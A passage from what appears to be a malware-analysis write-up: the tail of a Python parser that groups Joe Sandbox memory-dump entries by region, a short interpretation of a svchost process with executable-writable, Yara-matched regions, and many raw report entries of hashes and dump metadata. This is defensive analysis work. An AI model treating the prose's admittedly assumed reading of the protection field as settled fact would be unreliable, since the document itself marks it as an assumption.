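    for b in blocks:
        r = regions.setdefault(b["source"].base, RegionSummary(b["source"]))
        r.functions += 1
        r.yara_match |= b["yara"]
        if b["fields"].get("String ID"):
            r.strings.add(b["fields"]["String ID"])
    return regions


if __name__ == "__main__":
    for base, r in sorted(summarize(parse_blocks(SAMPLE)).items()):
        print("%#010x %-22s pe=%s yara=%s funcs=%d strings=%s" % (
            base, PAGE_PROTECT.get(r.source.protect, hex(r.source.protect)),
            r.source.based_on_pe, r.yara_match, r.functions, sorted(r.strings)))
```

Grouping by region is what makes this section readable: every function listed here comes from process index 2 (svchost, per the snapshot file names), both dumps are "based on PE: true", and, if the fifth name field is the page protection as assumed, both regions were PAGE_EXECUTE_READWRITE at dump time. Only the 0x400000 region carries Yara matches, while strings such as LdrCreateEnclave and verifier.dll are referenced from the 0x3A00000 region; the parser raises on an entry whose name and Offset disagree rather than silently grouping it.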
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                                                              • Instruction ID: 6fbce891d9f818f494d72422d15df822fdb05b6e321b029bfa68d0690afc47d2
                                                                              • Opcode Fuzzy Hash: 64946e9dabe8aba28621b19d6e3227fc6d1afc83f8bebb0082a29be0db3791f8
                                                                              • Instruction Fuzzy Hash: 72822472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                                                              • Instruction ID: b3bf6c691027b21751907d691d6345ae7fc044addd97febb5ee356fea1904e5d
                                                                              • Opcode Fuzzy Hash: e65f05a1615ff5c1a4010c50d37bc8e815a76bfac9a4a9ec590de5eb281f5b41
                                                                              • Instruction Fuzzy Hash: 24625D32D0464AAFCF25CF08D8D04AEFB62FE96314B49C59EC89A27604D371B955CBD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                                                              • Instruction ID: 16fc4a8226e41a7dac7f2e65bf8ef19f50a48dd95ae372ad31c2479c48160fe3
                                                                              • Opcode Fuzzy Hash: ef0f2544c8d3779d6d4dfb82d9006e13fa88ac152a3accf1697d6f605330f822
                                                                              • Instruction Fuzzy Hash: 9742B275A006168FDB19DF59C480ABEF7B6FF88314B28856ED552AB340D736EC42CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                              • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                              • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                              • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                                                              • Instruction ID: 04ce30bfdaf64d71ccf378f6251d18e3c83e7f2c93f7933e3fbf6e43a6a8eb55
                                                                              • Opcode Fuzzy Hash: 81e494968242cc8b720a761f4bc4784d10c50a1e615cb779630ed1133fa611cf
                                                                              • Instruction Fuzzy Hash: CF32AC75E01219DBCF24DFA8C980BAEBBB5FF54715F18012EE805AB391E7759901CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                                                              • Instruction ID: 2bfcdc2998f07bb6f57392fc971a6311871a03aea88db90e97db48ad4b90c19e
                                                                              • Opcode Fuzzy Hash: 065ecc1c65ee976f6b369168ba7db29f7802cbd6bac046efdb413d9ba4b45358
                                                                              • Instruction Fuzzy Hash: 5532DD74A007558BEF24CF69C944BBEFBF6AF84314F18855FE486AB294DB35A801CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                                                              • Instruction ID: 87f764a26d766adcee432b7554d6a7f803e4bbc619688835f37feaea24baf18e
                                                                              • Opcode Fuzzy Hash: b961176c4f6c4d008ea44a96ce7d27a4b3b43b675b9232768e10d619f2a17901
                                                                              • Instruction Fuzzy Hash: 3422AB742046618BDB28CF29C094772B7F1AF45304F08889FE897CF686E739E592DB61
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                                                              • Instruction ID: 287ff0ca072b195f876349ec591eb16c6143cd7d0fe933948c9601898a150334
                                                                              • Opcode Fuzzy Hash: d589941aece0bcede756f4604df1a334bb86b86965d5e6884488ead82d2ebb37
                                                                              • Instruction Fuzzy Hash: E522C335A00216CFCB19CF99C580ABAF3B2FF89314B18456EE655DB344DB34E942CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                              • Instruction ID: 1d437bc637994d3992a72425f0fbfaae8e3bf18cb03c79e04429648cfe023f1b
                                                                              • Opcode Fuzzy Hash: 010c80d2b74bfcffc7959ee126e5faf0a40012bd2321fe53c0fa4699254a5fd4
                                                                              • Instruction Fuzzy Hash: 7C228F796047128FC718CF59C490A2AF3E5FF89314B188A6EFA96CB355D730E842CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                              • Instruction ID: 94df3cf246010cfaafb1c0041b3ecd38d6ee7f8b71d6a42ad1d269ada8b0e0de
                                                                              • Opcode Fuzzy Hash: ca1204758695afc4632570382ca9c3d6f7a9d63c5db51cf53951cfe7028869a1
                                                                              • Instruction Fuzzy Hash: 0E222D74E00216DBDF15CF95C5809BEFBFABF88704B18849BE845AB241E738D981CB64
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                              • Instruction ID: b62ed8de75b2f781a22b7813e12d41d21ccbffb24ed0dd0a4fb1a4ea06d110a2
                                                                              • Opcode Fuzzy Hash: f549744c47dda49088779e27412f38d33cf21f1d752a09c8a2df7f4c60cdac0b
                                                                              • Instruction Fuzzy Hash: 3202C0386046518FDB64CFAAC490375F7F1AF85300B58899FFA96CB281D738D842DB60
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                              • Instruction ID: 3b811accfb1cfa5ce37e2aabf50c2229fa77ce07ce53558ac097391ac4897ee2
                                                                              • Opcode Fuzzy Hash: be258b6fea864cf4359b95138e98d4eecbe63f075bef0091efeb3ae75aecbb48
                                                                              • Instruction Fuzzy Hash: 73F1C372E006159BCB18CFA9C9A067EFFF5EF98214B1941B9D456DB3C0E634EA41CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                              • Instruction ID: ce515182fef757e73aeb42bf0f94abc608d42de38618f3313618c63175d3655c
                                                                              • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                              • Instruction Fuzzy Hash: 34026F73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                              • Instruction ID: d1e54e0368da9e29f3f0aed82128caba8a998576649fb9c4ca28242c9b9f0125
                                                                              • Opcode Fuzzy Hash: 3d0c96eb65a7642ed681ea43d694a6d50155b34cfb25b6159460166aa3404c5d
                                                                              • Instruction Fuzzy Hash: CFF19372E006269BCB28CE68C9A05BDFFB5EF45214B1946B9D856EB3C0D734DE41CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                              • Instruction ID: 939cfa0ea574c21447ad650e9f46939894ca7ff5000eaa234cc67455e4292d0b
                                                                              • Opcode Fuzzy Hash: 14e75e358f1a09723d4d273bd3d76b0a0eccc906416f42f7285a237e64899909
                                                                              • Instruction Fuzzy Hash: 22D1C575A007269FCB14DF68C990ABABBB9BF54304F08466FF816DB280E738D945C760
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                              • Instruction ID: b2ffc979e7cadfe790f9783d28e1dbfa097eb35e5f5a32582f4532ce140d7aa8
                                                                              • Opcode Fuzzy Hash: af788007d720981c2ddcd809ac01adda6874c23c630ef7df2aea005a9ff55447
                                                                              • Instruction Fuzzy Hash: CAD16971E043199BEF28CF98C5847BDBBB6FB45320F18806FE942AB699D7748941CB44
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                              • Instruction ID: 903f77be1ac4cbca7fe8baf5e9558ff801441611d76a48730291500461cb91d8
                                                                              • Opcode Fuzzy Hash: 5410c8bf43a3cbe9b2bcd24f4c5d99b76ae36e1554b39ae63c944b738f609520
                                                                              • Instruction Fuzzy Hash: 59E18D75A00205CFDB18CF59C990BAAB7F5FF98310F2881AEE855AB791D730E951CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                              • Instruction ID: f4b7adac504025bebbe3cadeac8e0987fca3345e1a0651529aef0ab6ce85b13f
                                                                              • Opcode Fuzzy Hash: 75a722c63460b45cf499efff8fdd3bf73e73ceb327c6b226970a47f4706e03cf
                                                                              • Instruction Fuzzy Hash: 54D1B431A003198FDB35DB19C994BAAF7B5BB89304F0841EFD9099B242D774AD85CB51
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                                                              • Instruction ID: 91b341f987e0021196cfe70de431e38e2335d18662574aba47b70191637fdce5
                                                                              • Opcode Fuzzy Hash: 2a5f30605faa9238452d1ae9b346d32fcb01466614ddf09d838fb08675a92b04
                                                                              • Instruction Fuzzy Hash: 3FC17375E002159BEF14CF5AC940BAEF7B5EB59314F18826FE815AB390D774A942CB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                              • Instruction ID: e9098882c6ac9fdd2b330ae05871ab73bbd017513b3bbca89b0527953fd76a6d
                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                              • Instruction Fuzzy Hash: F0B12435600645AFDF21DB68C940BBEFBF6EF89200F18459BD642AB381DB30E941DB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                                                              • Instruction ID: 866d99ded5bffed84e667a391d276ea3bec99fc0a362cf048515939d6cbaa721
                                                                              • Opcode Fuzzy Hash: 4914fbd8ec3692c8f7878bc08d4f8b373f961683d4bb13091dadd7dd0d0973c6
                                                                              • Instruction Fuzzy Hash: FDA14975900215AFEF26EFA4CC85FAFB7B9AF55750F05005AFA00AF2A0D7759850CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: befdeb9fb5d91676861ffe5249d53370050a301aec4a6d7fe08440b3cb12d4de
                                                                              • Instruction ID: eb15f13e897bb9a97d4ae893c550052aea872bc8d3120c3dc2290b1a5d3b8ed3
                                                                              • Opcode Fuzzy Hash: befdeb9fb5d91676861ffe5249d53370050a301aec4a6d7fe08440b3cb12d4de
                                                                              • Instruction Fuzzy Hash: 72C129745083418FDB64CF19C494BABB7E9BF88304F44496EF9899B390D778E909CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db6254167b5318c7f9b9a1d8bb7c1ed3fae916c08aec39784e658436694685aa
                                                                              • Instruction ID: 9e72d4e71278ca5f4157e799e2c682b328f03e738fffbdb233227cac67a64f58
                                                                              • Opcode Fuzzy Hash: db6254167b5318c7f9b9a1d8bb7c1ed3fae916c08aec39784e658436694685aa
                                                                              • Instruction Fuzzy Hash: 6FA1AD75B0071A9BDB24DF69C9D0BAAB7F5FF54314F04412EEA459B281EB38E811CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 279c1fd1339c647258f6b1d8e9451357b650e49d7056da80c0414fc29f0f6280
                                                                              • Instruction ID: 618646c34ca37f1488ba31797c5deba8965c66d098195213fdd505bb64000b22
                                                                              • Opcode Fuzzy Hash: 279c1fd1339c647258f6b1d8e9451357b650e49d7056da80c0414fc29f0f6280
                                                                              • Instruction Fuzzy Hash: 24910135A006219BEB24DB28D940F7AB7F5FBD4714F0985AFE805AB390E7349901C791
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              • Instruction ID: 71c0c36b114e8567936c3ee2240cb89420d5a52c6967ea6fe967638005a442a9
                                                                              • Opcode Fuzzy Hash: a3de7bfd220899a245adaf27acc33cb3ed554d7c128db9940cd4549b1d5f1279
                                                                              • Instruction Fuzzy Hash: B56123B5A00605EFDB18DF68C580AADFBB5FF89304F18856FE519A7340DB35A941CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8259485a1ea8f193066365729dc68a009227554699174c79a4f0eb6877d7ec44
                                                                              • Instruction ID: fdeef5b6294c43eaf4f615a99ca215fb3b358faf2350f8c4bcf4b3c5add0ea5d
                                                                              • Opcode Fuzzy Hash: 8259485a1ea8f193066365729dc68a009227554699174c79a4f0eb6877d7ec44
                                                                              • Instruction Fuzzy Hash: 1161DF352047428FD315DFA8C994B6BB7E4BF90708F18496EFA858B391DB35E806CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                              • Instruction ID: e166fbb1b322efa79da8d6305b759d37e86ded2fedeea4b75bfbf3b058a5a72f
                                                                              • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                              • Instruction Fuzzy Hash: 8251143260430A5FC715DF6AC85076AFBE6AFC1260F19846FFA56CB349DA30D9098791
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                              • Instruction ID: 7a09b7fa9cffbdb2f4e05d0d7635c974e09d052f73ab3fc7bab5eeb08894ae18
                                                                              • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                              • Instruction Fuzzy Hash: 2A5182B3E14A214BD3188E09CC40631B792FFD8312B5F81BADD199B357CA74E9529A90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                                                              • Instruction ID: 38db14aedf57af1314f5e5ca0520f7c6de744aa5ee7f235083505909804e4d3f
                                                                              • Opcode Fuzzy Hash: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                                                              • Instruction Fuzzy Hash: 0951C136A1014A8FCB08CFA8C480AEEB7F1EF98314B19827ED915DB355E731DA15CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
                                                                              • Instruction ID: 14baf193abc821607c6d58d3f3da0c0bfcc6ca8cbab737ca72ca89da183d8a0b
                                                                              • Opcode Fuzzy Hash: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
                                                                              • Instruction Fuzzy Hash: 54510579A00615AFCB11CF68C480769F7B4FF95710F0942AAE895DB780E734E9A1CBC0
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e65e0d53bce0ed5dc2747d5d84943ebe9f77f2f9af1d63b20bd671698ba1f3e
                                                                              • Instruction ID: b695ad066945d7c90a1dbc5daac19342224fddc62da2f92e840dc1a4afb145f5
                                                                              • Opcode Fuzzy Hash: 4e65e0d53bce0ed5dc2747d5d84943ebe9f77f2f9af1d63b20bd671698ba1f3e
                                                                              • Instruction Fuzzy Hash: 515160B3E14A214BD318CE09CC40636B692FFD8312B5F81BEDD199B357CA74E9529A90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3de62753f094db0db477ed5fb30864175be209c4d3e01ee99ffb5e90afa4d9aa
                                                                              • Instruction ID: a9b55d9b4565b88b3633d88ae5051021b05ab70c1e98395b23f42eed6828e350
                                                                              • Opcode Fuzzy Hash: 3de62753f094db0db477ed5fb30864175be209c4d3e01ee99ffb5e90afa4d9aa
                                                                              • Instruction Fuzzy Hash: C851E176A0060AEFEF15DF64C944BADB7F8BF46315F1441ABE402A76A0EB749911CF80
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28f25674bd7812529728c4a807f1b3a7aad6acb568bc368bb3341bdfd070c871
                                                                              • Instruction ID: 477aaac31d32c0ad89f2ced593988b6425b949bd9d12c21f7d126f4d8b42c527
                                                                              • Opcode Fuzzy Hash: 28f25674bd7812529728c4a807f1b3a7aad6acb568bc368bb3341bdfd070c871
                                                                              • Instruction Fuzzy Hash: C9519E37E4012D4BEF24CA58D461BEFB3F6EB44310F48086AE849BB3C5C6B66A57D550
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80d4643433773eaa82b24366a5f607725bdab2eb491ba1c22f0e916330656c0c
                                                                              • Instruction ID: 48871060aeace8029d0d9688ad1bb4a9ecd59f3ea998dffd3849c5886cd40752
                                                                              • Opcode Fuzzy Hash: 80d4643433773eaa82b24366a5f607725bdab2eb491ba1c22f0e916330656c0c
                                                                              • Instruction Fuzzy Hash: 9051DE75A00A15ABCB14DF6DC4A0ABEB7B4FF45700B0845AFE881DBB90E734D850CB90
                                                                              Memory Dump Source
